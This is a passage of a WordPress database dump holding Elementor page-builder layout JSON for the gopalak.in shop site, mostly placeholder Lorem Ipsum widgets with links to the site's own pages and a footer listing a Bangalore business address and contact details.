here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"3427821\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"981ddd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"769b005\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ef95559\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"4c2bf26\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"550a2fe\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"d29feb9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"c8fdf6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5bf1ad\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"9453712\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"e15dab4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c1b003\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"71c81df\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f37c86d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f839c1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0d6b040\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e374c42\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"27bc579\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e6bf144\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"4958df1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"48ae73c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4fbe7c9\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7f118ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"1094c04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"23f1949\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"564a60c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4f7aa47\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6b7196e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"db3e45f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"c6757ae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f80f2bc\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"fe9d098\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1279df7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"61ee343\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1189e91\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#E2E4E28C\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#FF8236\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b0a2b03\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"27202c7\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#F0F0F0\"},\"elements\":[{\"id\":\"3c307c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"d2c5d23\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false},{\"id\":\"4cc038b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f7f100a\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false},{\"id\":\"f270d26\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"802fcc9\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false},{\"id\":\"53f4aeb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f85352a\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"204ce8a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ef00601\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0d3e7a9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-220,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/strong><\\/h4>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8692,1510,'_elementor_page_assets','a:0:{}'),(8707,1512,'_elementor_edit_mode','builder'),(8708,1512,'_elementor_template_type','wp-page'),(8709,1512,'_elementor_version','3.7.7'),(8710,1512,'_wp_page_template','elementor_canvas'),(8711,1512,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\",\"_margin\":{\"unit\":\"px\",\"top\":\"-24\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"da958fb\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#DDD6D636\"},\"elements\":[{\"id\":\"708fcb4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"52f19eb\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"Accordion #1\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c1c0cb1\"},{\"tab_title\":\"Accordion #2\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c81da6b\"},{\"_id\":\"de1d949\",\"tab_title\":\"Accordion Title\"},{\"_id\":\"cb17b05\",\"tab_title\":\"Accordion Title\"}],\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"faq_schema\":\"yes\",\"border_width\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_element_width\":\"inherit\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e357abe\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b3b6eb2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ae4d7ac\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"20a83dc\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bc85492\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"a53f4e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"88d8734\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"006d2d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"fb06b27\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6df56a4\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"3427821\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"981ddd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"769b005\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ef95559\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"4c2bf26\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"550a2fe\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"d29feb9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"c8fdf6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5bf1ad\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"9453712\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"e15dab4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c1b003\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"71c81df\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f37c86d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f839c1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0d6b040\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e374c42\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"27bc579\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e6bf144\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 